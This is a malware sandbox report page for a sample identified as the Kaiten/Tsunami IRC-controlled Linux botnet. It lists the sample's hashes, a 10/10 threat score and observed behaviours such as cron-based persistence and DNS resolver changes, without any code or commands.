Overview

overview

10

Static

static

1

69278e9f62...kes118

debian-12-armhf

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    69278e9f629f9b18ab8f80e18b422986_JaffaCakes118

  • Size

    573KB

  • Sample

    240730-addrwaxfnm

  • MD5

    69278e9f629f9b18ab8f80e18b422986

  • SHA1

    11217cac6023d4b0eddf7955b01ee22ee83d8fa8

  • SHA256

    8fb043c6e802a5d71bc908fe3a652f0076a7975310ce8772869b3980b1189c84

  • SHA512

    edd5cfa6bfd7a9d4a517955d941df3fc680897c2d0c1a89dc3d9c07a8329927bfd462cb28a072e01698dbdea14760874b3ba9c61f2733a47ced09610ee6d6e79

  • SSDEEP

    12288:xgzrhDDhR68i/YkE1a+ZdVI4GvTIy6Q3xxPlitj4QqufXtIJ:xgdhR69u1aYGvTIyDxxPUFTi

Score
10/10
kaitenbotnetpersistence

Malware Config

Targets

    • Target

      69278e9f629f9b18ab8f80e18b422986_JaffaCakes118

    • Size

      573KB

    • MD5

      69278e9f629f9b18ab8f80e18b422986

    • SHA1

      11217cac6023d4b0eddf7955b01ee22ee83d8fa8

    • SHA256

      8fb043c6e802a5d71bc908fe3a652f0076a7975310ce8772869b3980b1189c84

    • SHA512

      edd5cfa6bfd7a9d4a517955d941df3fc680897c2d0c1a89dc3d9c07a8329927bfd462cb28a072e01698dbdea14760874b3ba9c61f2733a47ced09610ee6d6e79

    • SSDEEP

      12288:xgzrhDDhR68i/YkE1a+ZdVI4GvTIy6Q3xxPlitj4QqufXtIJ:xgdhR69u1aYGvTIyDxxPUFTi

    Score
    10/10
    kaitenbotnetpersistence

    • Detects Kaiten/Tsunami Payload

    • Kaiten/Tsunami

      Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.

      botnetkaiten

    • Writes DNS configuration

      Writes data to DNS resolver config file.

    • Creates/modifies Cron job

      Cron allows running tasks on a schedule, and is commonly used for malware persistence.

      persistence
    behavioral1

MITRE ATT&CK Enterprise v15

Tasks